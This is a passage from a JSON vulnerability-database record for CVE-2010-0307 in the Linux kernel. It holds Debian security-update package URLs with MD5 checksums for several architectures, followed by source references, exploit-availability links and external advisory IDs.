http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-4kc-malta_2.6.26-21lenny2_mips.deb\n    Size/MD5 checksum: 23363494 31066703509d7bbaea31272350df78a4\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-sb1-bcm91250a_2.6.26-21lenny2_mips.deb\n    Size/MD5 checksum: 20135662 777f9ee3f47b55d1faeba8b2a3903942\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all-mips_2.6.26-21lenny3_mips.deb\n    Size/MD5 checksum:   108760 3a0e18806710cf691522c6a0808128e4\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-r5k-ip32_2.6.26-21lenny3_mips.deb\n    Size/MD5 checksum: 15652726 47e9d348fb7cbb113198a26981601e0c\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all_2.6.26-21lenny2_mips.deb\n    Size/MD5 checksum:   108554 22d6bf0c82b4f969af7c9855d8e54198\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-r5k-ip32_2.6.26-21lenny2_mips.deb\n    Size/MD5 checksum:   280788 2fc79c75a0e2fc12ec263b902370e10f\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-4kc-malta_2.6.26-21lenny2_mips.deb\n    Size/MD5 checksum:   352166 86b7b9b0f7953b14663ac49ba072d395\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-sb1-bcm91250a_2.6.26-21lenny3_mips.deb\n    Size/MD5 checksum:   297878 b67b45ea758b284a0d48c00d446cd748\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-sb1a-bcm91480b_2.6.26-21lenny3_mips.deb\n    Size/MD5 checksum: 20122020 6b407d7fd8efffeaf63d45319db0fc55\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-sb1a-bcm91480b_2.6.26-21lenny2_mips.deb\n    Size/MD5 checksum: 20122988 3b90f7c4b6f70455de8a5c6fc7668c90\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-5kc-malta_2.6.26-21lenny2_mips.deb\n    Size/MD5 checksum:   350718 673dc7f162bd005127309ecc81421b0c\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-r4k-ip22_2.6.26-21lenny2_mips.deb\n    Size/MD5 checksum: 11493416 b77c1c4c8bfe696e5de4641b6359b1f6\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all-mips_2.6.26-21lenny2_mips.deb\n    Size/MD5 checksum:   108606 aa52252ee2852e92c33cec271aff9916\n\nmipsel architecture (MIPS (Little Endian))\n\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common_2.6.26-21lenny2_mipsel.deb\n    Size/MD5 checksum:  3893180 73266c7fc609bf9f750e841875192915\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-4kc-malta_2.6.26-21lenny2_mipsel.deb\n    Size/MD5 checksum: 22910150 e2748973530548f7159cbf6f538cb4c3\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-5kc-malta_2.6.26-21lenny2_mipsel.deb\n    Size/MD5 checksum: 28415222 3ae3611f1517f2ecfc899d0cbda71e6f\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-sb1-bcm91250a_2.6.26-21lenny3_mipsel.deb\n    Size/MD5 checksum:   297088 1f70ee9f4282255390e63065e9fa622a\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all-mipsel_2.6.26-21lenny3_mipsel.deb\n    Size/MD5 checksum:   108760 717a49d4823040faab42145c1b2e1e41\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-5kc-malta_2.6.26-21lenny3_mipsel.deb\n    Size/MD5 checksum:   350948 92c44d0ecd82b440afa0e7d741ad5684\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-r5k-cobalt_2.6.26-21lenny3_mipsel.deb\n    Size/MD5 checksum: 14949410 0353fee416b7488c848453208a0f4cca\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all_2.6.26-21lenny3_mipsel.deb\n    Size/MD5 checksum:   108708 04c572a258e844e1595f8d810ead5a93\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-sb1-bcm91250a_2.6.26-21lenny3_mipsel.deb\n    Size/MD5 checksum: 19563254 0782f6e31196abc07bbc0290c2b767a7\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-4kc-malta_2.6.26-21lenny2_mipsel.deb\n    Size/MD5 checksum:   352038 a8013bf2fa8e126b71bf4c1158f1002c\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-libc-dev_2.6.26-21lenny2_mipsel.deb\n    Size/MD5 checksum:   744406 c2fbab4a4e1e882b1388f6adc6032213\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-r5k-cobalt_2.6.26-21lenny2_mipsel.deb\n    Size/MD5 checksum:   292376 a4e4702b73d9283a5bc26dad7c3323b6\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-sb1a-bcm91480b_2.6.26-21lenny2_mipsel.deb\n    Size/MD5 checksum: 19558208 909b1772ff02ef617734dfcb8bf18747\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-sb1a-bcm91480b_2.6.26-21lenny2_mipsel.deb\n    Size/MD5 checksum:   296318 b6730e89326eee6c9306dd1cc7ebc928\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-sb1-bcm91250a_2.6.26-21lenny2_mipsel.deb\n    Size/MD5 checksum: 19567570 094286b9487c516a27a850e08c32931d\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all_2.6.26-21lenny2_mipsel.deb\n    Size/MD5 checksum:   108556 b4bcc6570f0b7337263d34ebd7e7ceb6\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-sb1a-bcm91480b_2.6.26-21lenny3_mipsel.deb\n    Size/MD5 checksum:   297264 fbb0ada7a1680fb2f00b615186936f73\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-5kc-malta_2.6.26-21lenny3_mipsel.deb\n    Size/MD5 checksum: 28416038 27237e256488565425ebaa8d6ab781b8\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-4kc-malta_2.6.26-21lenny3_mipsel.deb\n    Size/MD5 checksum: 22910044 ce0baa79dcc512708e04d5dc668e3119\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all-mipsel_2.6.26-21lenny2_mipsel.deb\n    Size/MD5 checksum:   108608 7680f595061b4146bedd8a319e0af7ad\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-sb1-bcm91250a_2.6.26-21lenny2_mipsel.deb\n    Size/MD5 checksum:   296886 4223f4b9674acc651572e3cb432c8dec\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common_2.6.26-21lenny3_mipsel.deb\n    Size/MD5 checksum:  3893194 5c157b25a27392a97c5aec2d078985df\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-4kc-malta_2.6.26-21lenny3_mipsel.deb\n    Size/MD5 checksum:   351946 c134f08fc56a4d7288433cba264437e3\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-r5k-cobalt_2.6.26-21lenny3_mipsel.deb\n    Size/MD5 checksum:   292572 6ddf47b5231ff541a6ebb0cc386228f7\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-sb1a-bcm91480b_2.6.26-21lenny3_mipsel.deb\n    Size/MD5 checksum: 19556346 01e04778dc95a69e11e6198194985b8f\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-libc-dev_2.6.26-21lenny3_mipsel.deb\n    Size/MD5 checksum:   744340 dedd7c4693d5227fc726874988b6a0f1\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-r5k-cobalt_2.6.26-21lenny2_mipsel.deb\n    Size/MD5 checksum: 14949144 dc4f2aa55f036d3d2ffaf92f0e0f1ca3\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-5kc-malta_2.6.26-21lenny2_mipsel.deb\n    Size/MD5 checksum:   350654 1b7fe619ab4fc0cb0df29c3a2675e8b6\n\npowerpc architecture (PowerPC)\n\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all_2.6.26-21lenny3_powerpc.deb\n    Size/MD5 checksum:   108752 6bce46cb07333205c6d970db413a51df\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-libc-dev_2.6.26-21lenny3_powerpc.deb\n    Size/MD5 checksum:   758014 1f68cb39b3c3d26d654dbbcf17e38570\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-powerpc64_2.6.26-21lenny3_powerpc.deb\n    Size/MD5 checksum:   374268 b8682d2fb8d9e75eecb3d046d606d321\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-vserver-powerpc_2.6.26-21lenny3_powerpc.deb\n    Size/MD5 checksum: 23659188 e24d0a87309db7d7a63e3273f8432899\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-vserver-powerpc64_2.6.26-21lenny3_powerpc.deb\n    Size/MD5 checksum:   374612 a2841b95f64a4b7486f431504b992d95\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-powerpc_2.6.26-21lenny3_powerpc.deb\n    Size/MD5 checksum: 23232706 664334238582c7421ca887e155b5114c\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-powerpc-smp_2.6.26-21lenny3_powerpc.deb\n    Size/MD5 checksum: 23634322 df1bf16b4f8e6bf59f33fb409bf9f62b\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-powerpc64_2.6.26-21lenny3_powerpc.deb\n    Size/MD5 checksum: 23480278 adcd1522810051a3adefe3b84df84b1d\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common-vserver_2.6.26-21lenny3_powerpc.deb\n    Size/MD5 checksum:  3886604 e7ca971a8ed765aefd349a914bb55a66\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-vserver-powerpc_2.6.26-21lenny3_powerpc.deb\n    Size/MD5 checksum:   370296 4e330a4850fda773f6ef212c9cb6b0cf\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-vserver-powerpc64_2.6.26-21lenny3_powerpc.deb\n    Size/MD5 checksum: 23535520 7dc32e3fa484672149c86080ff072315\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-powerpc_2.6.26-21lenny3_powerpc.deb\n    Size/MD5 checksum:   368624 d0a1ad90a03d524d6e5e3fedd5dddf01\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all-powerpc_2.6.26-21lenny3_powerpc.deb\n    Size/MD5 checksum:   108790 26a11a94f15ceeb11e29b6d631471170\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-powerpc-smp_2.6.26-21lenny3_powerpc.deb\n    Size/MD5 checksum:   370170 7616bfb6b57b95757a63c4e0b3870ad1\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common_2.6.26-21lenny3_powerpc.deb\n    Size/MD5 checksum:  3851336 6812d0f66042a59ae627cf08398396e6\n\ns390 architecture (IBM S/390)\n\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-s390x_2.6.26-21lenny1_s390.deb\n    Size/MD5 checksum:   231812 443d9a58058ef675f117774c6acb53e6\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-s390x_2.6.26-21lenny1_s390.deb\n    Size/MD5 checksum:  7782010 4150695cebaa7114b588086a85b8d761\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-vserver-s390x_2.6.26-21lenny1_s390.deb\n    Size/MD5 checksum:  7843882 49726eeb18d912aae4c501609b06e321\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-vserver-s390x_2.6.26-21lenny3_s390.deb\n    Size/MD5 checksum:   233290 ea85fcc3ad76b995206105d1ad0f8f0b\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-s390x_2.6.26-21lenny3_s390.deb\n    Size/MD5 checksum:   232154 724e6da916fb3eabc419900417e45c10\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-vserver-s390x_2.6.26-21lenny2_s390.deb\n    Size/MD5 checksum:   233170 b6a5976881616d1c07212bc6f17ad314\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-s390_2.6.26-21lenny1_s390.deb\n    Size/MD5 checksum:   231438 9da054d96d343d8c5e4af7a3a7b94a74\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all_2.6.26-21lenny2_s390.deb\n    Size/MD5 checksum:   108544 fa872af4eef01b3c001a1312107b4127\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all-s390_2.6.26-21lenny2_s390.deb\n    Size/MD5 checksum:   108568 d100107291909e29dc1b4026916959c2\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-vserver-s390x_2.6.26-21lenny2_s390.deb\n    Size/MD5 checksum:  7844118 044d92fce39f973d466a84dab2ced59e\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-s390x_2.6.26-21lenny3_s390.deb\n    Size/MD5 checksum:  7780936 aa4394bec7213a65e1c3f59fe637b2d6\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-vserver-s390x_2.6.26-21lenny1_s390.deb\n    Size/MD5 checksum:   232980 00e17f6e7a6719d0cef0e89fda1d3a76\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common_2.6.26-21lenny1_s390.deb\n    Size/MD5 checksum:  3532850 0ade36f410f94be998164118f36aa832\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-s390x_2.6.26-21lenny2_s390.deb\n    Size/MD5 checksum:   231988 9e9a3e06b018c3aa676ef7ab6af83c59\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-libc-dev_2.6.26-21lenny1_s390.deb\n    Size/MD5 checksum:   743394 4e8feb51e6eb5fbc8e62895cef2b73cd\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common_2.6.26-21lenny3_s390.deb\n    Size/MD5 checksum:  3532886 5b7b7e631e3bb226e3baad772169f633\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-s390_2.6.26-21lenny2_s390.deb\n    Size/MD5 checksum:   231350 371b0d728b1462b23646f59854e179c3\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common-vserver_2.6.26-21lenny3_s390.deb\n    Size/MD5 checksum:  3565332 fc1be5997c795ab339153d571116ee2e\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-s390_2.6.26-21lenny3_s390.deb\n    Size/MD5 checksum:  7491026 a2e9b13bd73fe526a607551cfded3032\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common-vserver_2.6.26-21lenny2_s390.deb\n    Size/MD5 checksum:  3565334 2f991b448d637633ff0450d084eda972\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-s390-tape_2.6.26-21lenny2_s390.deb\n    Size/MD5 checksum:  1631554 1324987d809936d18f08c781d8e66107\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-libc-dev_2.6.26-21lenny3_s390.deb\n    Size/MD5 checksum:   743468 d0083c16129f2f21574146ad117ec17f\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common_2.6.26-21lenny2_s390.deb\n    Size/MD5 checksum:  3533014 213740094d15f4b7f552d543b2aa4518\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all_2.6.26-21lenny1_s390.deb\n    Size/MD5 checksum:   108424 931c2376543c633f7c4fbaa122c4fa59\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common-vserver_2.6.26-21lenny1_s390.deb\n    Size/MD5 checksum:  3565296 5763e23f048ece3acac12c334a3aa1dc\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all-s390_2.6.26-21lenny3_s390.deb\n    Size/MD5 checksum:   108726 fc1cdbbe5bf3760aab56899b484839b1\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-libc-dev_2.6.26-21lenny2_s390.deb\n    Size/MD5 checksum:   743536 51ef4a41d5b6b58c2df474d41bb97c4f\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-s390-tape_2.6.26-21lenny1_s390.deb\n    Size/MD5 checksum:  1631388 05ca9fa4452242e54c5eddefd70005d3\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-s390-tape_2.6.26-21lenny3_s390.deb\n    Size/MD5 checksum:  1631704 0c1a5fe63cb770950bef2dbc55821e33\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-s390_2.6.26-21lenny1_s390.deb\n    Size/MD5 checksum:  7491476 7cedc121923d537a208b5217b8d1b96c\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-s390x_2.6.26-21lenny2_s390.deb\n    Size/MD5 checksum:  7782028 4a92f28cc6b0f6bdeb2df5686bcf4739\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-s390_2.6.26-21lenny2_s390.deb\n    Size/MD5 checksum:  7491588 3c58a3f4a1d9b89c0c189eb2407783c7\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-s390_2.6.26-21lenny3_s390.deb\n    Size/MD5 checksum:   231486 4f229cd14a2c27f0d2784acfc5929f92\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all_2.6.26-21lenny3_s390.deb\n    Size/MD5 checksum:   108702 1c33ae2d8ad15eed26d365f8815fcf06\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-vserver-s390x_2.6.26-21lenny3_s390.deb\n    Size/MD5 checksum:  7842050 5dcd3840524dad2b8dca28091e265c77\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all-s390_2.6.26-21lenny1_s390.deb\n    Size/MD5 checksum:   108442 05e65d77de538f379150ff888d4da788\n\nsparc architecture (Sun SPARC/UltraSPARC)\n\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-sparc64-smp_2.6.26-21lenny3_sparc.deb\n    Size/MD5 checksum:   304836 60db894e762c4c762d878fa4a538cee6\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all-sparc_2.6.26-21lenny1_sparc.deb\n    Size/MD5 checksum:   108454 122fa3253107c5867f1d7171b6802630\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-sparc64_2.6.26-21lenny3_sparc.deb\n    Size/MD5 checksum: 14249708 fd2527370a79250e8f374d05c5e48cfe\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-vserver-sparc64_2.6.26-21lenny1_sparc.deb\n    Size/MD5 checksum:   300434 4681dd7de1437b3ac2c8420c0c793496\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-vserver-sparc64_2.6.26-21lenny2_sparc.deb\n    Size/MD5 checksum:   305056 09a2296bbad709fadaa0a7acf597f123\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-sparc64-smp_2.6.26-21lenny2_sparc.deb\n    Size/MD5 checksum: 14573800 f8d7e11eb1667f2ead6bb8aa92dce7c4\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-sparc64_2.6.26-21lenny3_sparc.deb\n    Size/MD5 checksum:   303008 ca229d3e1d36665400bd0005858473e0\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-libc-dev_2.6.26-21lenny1_sparc.deb\n    Size/MD5 checksum:   784800 44122e452c72b7d854c6d29ce98e3d48\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-libc-dev_2.6.26-21lenny3_sparc.deb\n    Size/MD5 checksum:   799228 7f5dfb496b80755569d320bbf0ee4888\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common-vserver_2.6.26-21lenny3_sparc.deb\n    Size/MD5 checksum:  3822248 3048df9d0a20c7866253f79afa934735\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-sparc64-smp_2.6.26-21lenny2_sparc.deb\n    Size/MD5 checksum:   305374 05ade563f319712d4b8de7407a25e106\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-sparc64_2.6.26-21lenny1_sparc.deb\n    Size/MD5 checksum: 14199372 14dd0886b189b1ffa86855caf9568d71\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-sparc64_2.6.26-21lenny2_sparc.deb\n    Size/MD5 checksum: 14250896 29dc2c98bb0f9bc154b59486892686bd\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all-sparc_2.6.26-21lenny2_sparc.deb\n    Size/MD5 checksum:   108576 1ba3270b78802cd3fe15c8cc3746b482\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-sparc64_2.6.26-21lenny2_sparc.deb\n    Size/MD5 checksum:   302700 8d5d0c42583d5fa2bf0af6a4774b6be9\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-vserver-sparc64_2.6.26-21lenny3_sparc.deb\n    Size/MD5 checksum: 14592944 7098b971ee9d70eb92335ccfc9e071e9\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-sparc64_2.6.26-21lenny1_sparc.deb\n    Size/MD5 checksum:   297880 b8c7da78c57207af9f51fefef74810d3\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common_2.6.26-21lenny1_sparc.deb\n    Size/MD5 checksum:  3718614 62431ffe89341ef70445cc9b18b680aa\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-vserver-sparc64_2.6.26-21lenny3_sparc.deb\n    Size/MD5 checksum:   305236 1ecbd687d76f725e8ba018eaa3fac6c5\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-sparc64-smp_2.6.26-21lenny3_sparc.deb\n    Size/MD5 checksum: 14572560 614993b7b9f13159922158175d673ab9\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common-vserver_2.6.26-21lenny2_sparc.deb\n    Size/MD5 checksum:  3822498 20e7f68725ddf51332e0554a96f7bd6c\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-vserver-sparc64_2.6.26-21lenny1_sparc.deb\n    Size/MD5 checksum: 14539066 ff1e7b5d4c1d279254925efe261cbca7\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all_2.6.26-21lenny3_sparc.deb\n    Size/MD5 checksum:   108710 56304708930d0cd9c64a055b03511d4c\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-libc-dev_2.6.26-21lenny2_sparc.deb\n    Size/MD5 checksum:   799118 7a64b7389f1bf41511ce0c93665d8792\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all_2.6.26-21lenny1_sparc.deb\n    Size/MD5 checksum:   108430 a67227f066768bde2bb78cd578986f88\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-sparc64-smp_2.6.26-21lenny1_sparc.deb\n    Size/MD5 checksum: 14520660 dce34d857d90cbdab0dd73efa18b6859\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all-sparc_2.6.26-21lenny3_sparc.deb\n    Size/MD5 checksum:   108726 8295960b735e2799a889d5fd593b128a\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common_2.6.26-21lenny3_sparc.deb\n    Size/MD5 checksum:  3788028 34c07fccd4d1e9dbc1cfdd0918fb6bae\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common-vserver_2.6.26-21lenny1_sparc.deb\n    Size/MD5 checksum:  3751162 980707bc74c46c3859b6a1f0a10c1e5c\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all_2.6.26-21lenny2_sparc.deb\n    Size/MD5 checksum:   108556 9cf91819aceb42e810eed1da7ff5e384\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-vserver-sparc64_2.6.26-21lenny2_sparc.deb\n    Size/MD5 checksum: 14593082 1bcc020b8d5d0d58788293017b1c67ec\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-sparc64-smp_2.6.26-21lenny1_sparc.deb\n    Size/MD5 checksum:   299360 aa33980c597218177f9023b8b3dcb3f2\n  http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common_2.6.26-21lenny2_sparc.deb\n    Size/MD5 checksum:  3788198 22648123f5cde436d78c937cabe9655e\n\n  These files will probably be moved into the stable distribution on\n  its next update",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2010-0307"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2010-001203"
      },
      {
        "db": "BID",
        "id": "38027"
      },
      {
        "db": "VULHUB",
        "id": "VHN-42912"
      },
      {
        "db": "VULMON",
        "id": "CVE-2010-0307"
      },
      {
        "db": "PACKETSTORM",
        "id": "98419"
      },
      {
        "db": "PACKETSTORM",
        "id": "87376"
      },
      {
        "db": "PACKETSTORM",
        "id": "95883"
      },
      {
        "db": "PACKETSTORM",
        "id": "87629"
      },
      {
        "db": "PACKETSTORM",
        "id": "85802"
      },
      {
        "db": "PACKETSTORM",
        "id": "86286"
      }
    ],
    "trust": 2.61
  },
  "exploit_availability": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "reference": "https://www.scap.org.cn/vuln/vhn-42912",
        "trust": 0.1,
        "type": "unknown"
      },
      {
        "reference": "https://vulmon.com/exploitdetails?qidtp=exploitdb\u0026qid=33585",
        "trust": 0.1,
        "type": "exploit"
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-42912"
      },
      {
        "db": "VULMON",
        "id": "CVE-2010-0307"
      }
    ]
  },
  "external_ids": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "db": "NVD",
        "id": "CVE-2010-0307",
        "trust": 3.4
      },
      {
        "db": "BID",
        "id": "38027",
        "trust": 2.9
      },
      {
        "db": "OPENWALL",
        "id": "OSS-SECURITY/2010/02/01/5",
        "trust": 1.8
      },
      {
        "db": "OPENWALL",
        "id": "OSS-SECURITY/2010/02/04/1",
        "trust": 1.8
      },
      {
        "db": "OPENWALL",
        "id": "OSS-SECURITY/2010/02/04/9",
        "trust": 1.8
      },
      {
        "db": "OPENWALL",
        "id": "OSS-SECURITY/2010/02/01/1",
        "trust": 1.8
      },
      {
        "db": "SECUNIA",
        "id": "38492",
        "trust": 1.8
      },
      {
        "db": "SECUNIA",
        "id": "43315",
        "trust": 1.8
      },
      {
        "db": "SECUNIA",
        "id": "38922",
        "trust": 1.8
      },
      {
        "db": "SECUNIA",
        "id": "39649",
        "trust": 1.8
      },
      {
        "db": "SECUNIA",
        "id": "38779",
        "trust": 1.8
      },
      {
        "db": "VUPEN",
        "id": "ADV-2010-0638",
        "trust": 1.8
      },
      {
        "db": "SECUNIA",
        "id": "38354",
        "trust": 0.9
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2010-001203",
        "trust": 0.8
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201002-160",
        "trust": 0.7
      },
      {
        "db": "EXPLOIT-DB",
        "id": "33585",
        "trust": 0.2
      },
      {
        "db": "PACKETSTORM",
        "id": "87376",
        "trust": 0.2
      },
      {
        "db": "SEEBUG",
        "id": "SSVID-86792",
        "trust": 0.1
      },
      {
        "db": "VULHUB",
        "id": "VHN-42912",
        "trust": 0.1
      },
      {
        "db": "VULMON",
        "id": "CVE-2010-0307",
        "trust": 0.1
      },
      {
